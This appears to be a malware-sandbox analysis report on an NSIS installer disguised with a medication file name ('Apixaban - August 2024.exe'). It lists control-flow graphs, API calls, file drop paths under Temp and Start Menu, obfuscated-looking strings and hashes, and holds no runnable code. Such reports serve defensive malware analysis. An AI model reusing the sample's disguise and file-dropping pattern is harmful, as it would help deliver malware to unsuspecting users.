                                                control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 360 403011-403016 353->360 361 402f46-402f49 353->361 356 402e61 354->356 357 402e63-402e70 call 4032f7 354->357 356->357 365 402e76-402e7c 357->365 366 402fcd-402fd5 call 402d18 357->366 360->346 363 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 361->363 364 402f4b-402f63 call 40330d call 4032f7 361->364 390 402fc3-402fc8 363->390 391 402fd7-403007 call 40330d call 403060 363->391 364->360 393 402f69-402f6f 364->393 370 402efc-402f00 365->370 371 402e7e-402e96 call 405b0f 365->371 366->360 374 402f02-402f08 call 402d18 370->374 375 402f09-402f0f 370->375 371->375 386 402e98-402e9f 371->386 374->375 382 402f11-402f1f call 406300 375->382 383 402f22-402f2c 375->383 382->383 383->353 383->354 386->375 392 402ea1-402ea8 386->392 390->346 401 40300c-40300f 391->401 392->375 394 402eaa-402eb1 392->394 393->360 393->363 394->375 396 402eb3-402eba 394->396 396->375 398 402ebc-402edc 396->398 398->360 400 402ee2-402ee6 398->400 402 402ee8-402eec 400->402 403 402eee-402ef6 400->403 401->360 404 403018-403029 401->404 402->353 402->403 403->375 405 402ef8-402efa 403->405 406 403031-403036 404->406 407 40302b 404->407 405->375 408 403037-40303d 406->408 407->406 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DCE
                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
                                                • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                Strings
                                                • Error launching installer, xrefs: 00402E0A
                                                • soft, xrefs: 00402EAA
                                                • Inst, xrefs: 00402EA1
                                                • "C:\Users\user\Desktop\Apixaban - August 2024.exe", xrefs: 00402DC3
                                                • Null, xrefs: 00402EB3
                                                • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-2878596472
                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 401752-401777 call 402b38 call 4059aa 543 401781-401793 call 405ee8 call 405933 lstrcatW 538->543 544 401779-40177f call 405ee8 538->544 549 401798-401799 call 40617c 543->549 544->549 553 40179e-4017a2 549->553 554 4017a4-4017ae call 40622b 553->554 555 4017d5-4017d8 553->555 562 4017c0-4017d2 554->562 563 4017b0-4017be CompareFileTime 554->563 556 4017e0-4017fc call 405b54 555->556 557 4017da-4017db call 405b2f 555->557 565 401870-401899 call 405192 call 403060 556->565 566 4017fe-401801 556->566 557->556 562->555 563->562 578 4018a1-4018ad SetFileTime 565->578 579 40189b-40189f 565->579 567 401852-40185c call 405192 566->567 568 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 566->568 580 401865-40186b 567->580 568->553 600 401847-401848 568->600 582 4018b3-4018be FindCloseChangeNotification 578->582 579->578 579->582 583 4029ce 580->583 585 4018c4-4018c7 582->585 586 4029c5-4029c8 582->586 587 4029d0-4029d4 583->587 590 4018c9-4018da call 405f0a lstrcatW 585->590 591 4018dc-4018df call 405f0a 585->591 586->583 597 4018e4-402241 call 4056c4 590->597 591->597 597->586 597->587 600->580 602 40184a-40184b 600->602 602->567
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                                • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren,?,?,00000031), ref: 004017B8
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                • API String ID: 1941528284-2973341950
                                                • Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                • Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 604 405192-4051a7 605 4051ad-4051be 604->605 606 40525e-405262 604->606 607 4051c0-4051c4 call 405f0a 605->607 608 4051c9-4051d5 lstrlenW 605->608 607->608 610 4051f2-4051f6 608->610 611 4051d7-4051e7 lstrlenW 608->611 613 405205-405209 610->613 614 4051f8-4051ff SetWindowTextW 610->614 611->606 612 4051e9-4051ed lstrcatW 611->612 612->610 615 40520b-40524d SendMessageW * 3 613->615 616 40524f-405251 613->616 614->613 615->616 616->606 617 405253-405256 616->617 617->606
                                                APIs
                                                • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Completed
                                                • API String ID: 2531174081-3087654605
                                                • Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                • Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                                                Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 618 40317b-4031a4 GetTickCount 619 4032e5-4032ed call 402d18 618->619 620 4031aa-4031d5 call 40330d SetFilePointer 618->620 625 4032ef-4032f4 619->625 626 4031da-4031ec 620->626 627 4031f0-4031fe call 4032f7 626->627 628 4031ee 626->628 631 403204-403210 627->631 632 4032d7-4032da 627->632 628->627 633 403216-40321c 631->633 632->625 634 403247-403263 call 40638e 633->634 635 40321e-403224 633->635 640 4032e0 634->640 641 403265-40326d 634->641 635->634 637 403226-403246 call 402d18 635->637 637->634 645 4032e2-4032e3 640->645 643 4032a1-4032a7 641->643 644 40326f-403285 WriteFile 641->644 643->640 648 4032a9-4032ab 643->648 646 403287-40328b 644->646 647 4032dc-4032de 644->647 645->625 646->647 649 40328d-403299 646->649 647->645 648->640 650 4032ad-4032c0 648->650 649->633 651 40329f 649->651 650->626 652 4032c6-4032d5 SetFilePointer 650->652 651->650 652->619
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403190
                                                  • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                • WriteFile.KERNELBASE(0040BE78,00411DF7,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                • SetFilePointer.KERNELBASE(00130E8B,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$Pointer$CountTickWrite
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 2146148272-2559241417
                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
                                                Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 653 4015b9-4015cd call 402b38 call 4059de 658 401614-401617 653->658 659 4015cf-4015eb call 405960 CreateDirectoryW 653->659 661 401646-402195 call 401423 658->661 662 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 658->662 668 40160a-401612 659->668 669 4015ed-4015f8 GetLastError 659->669 675 4029c5-4029d4 661->675 662->675 676 40163e-401641 662->676 668->658 668->659 672 401607 669->672 673 4015fa-401605 GetFileAttributesW 669->673 672->668 673->668 673->672 676->675
                                                APIs
                                                  • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75572EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 004059EC
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren,?,00000000,000000F0), ref: 00401630
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren, xrefs: 00401623
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren
                                                • API String ID: 3751793516-1051084359
                                                • Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                • Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
                                                Function 0040638E Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 679 40638e-4063b1 680 4063b3-4063b6 679->680 681 4063bb-4063be 679->681 682 406ddb-406ddf 680->682 683 4063c1-4063ca 681->683 684 4063d0 683->684 685 406dd8 683->685 686 4063d7-4063db 684->686 687 406517-406bbe 684->687 688 40647c-406480 684->688 689 4064ec-4064f0 684->689 685->682 695 4063e1-4063ee 686->695 696 406dc3-406dd6 686->696 698 406bc0-406bd6 687->698 699 406bd8-406bee 687->699 693 406486-40649f 688->693 694 406d2c-406d36 688->694 690 4064f6-40650a 689->690 691 406d3b-406d45 689->691 697 40650d-406515 690->697 691->696 700 4064a2-4064a6 693->700 694->696 695->685 701 4063f4-40643a 695->701 696->682 697->687 697->689 704 406bf1-406bf8 698->704 699->704 700->688 705 4064a8-4064ae 700->705 702 406462-406464 701->702 703 40643c-406440 701->703 708 406472-40647a 702->708 709 406466-406470 702->709 706 406442-406445 GlobalFree 703->706 707 40644b-406459 GlobalAlloc 703->707 710 406bfa-406bfe 704->710 711 406c1f-406c2b 704->711 712 4064b0-4064b7 705->712 713 4064d8-4064ea 705->713 706->707 707->685 714 40645f 707->714 708->700 709->708 709->709 715 406c04-406c1c 710->715 716 406dad-406db7 710->716 711->683 718 4064c2-4064d2 GlobalAlloc 712->718 719 4064b9-4064bc GlobalFree 712->719 713->697 714->702 715->711 716->696 718->685 718->713 719->718
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 0-2559241417
                                                • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 720 402b78-402ba1 RegOpenKeyExW 721 402ba3-402bae 720->721 722 402c0c-402c10 720->722 723 402bc9-402bd9 RegEnumKeyW 721->723 724 402bb0-402bb3 723->724 725 402bdb-402bed RegCloseKey call 406252 723->725 727 402c00-402c03 RegCloseKey 724->727 728 402bb5-402bc7 call 402b78 724->728 732 402c13-402c19 725->732 733 402bef-402bfe 725->733 730 402c09-402c0b 727->730 728->723 728->725 730->722 732->730 735 402c1b-402c29 RegDeleteKeyW 732->735 733->722 735->730 737 402c2b 735->737 737->722
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
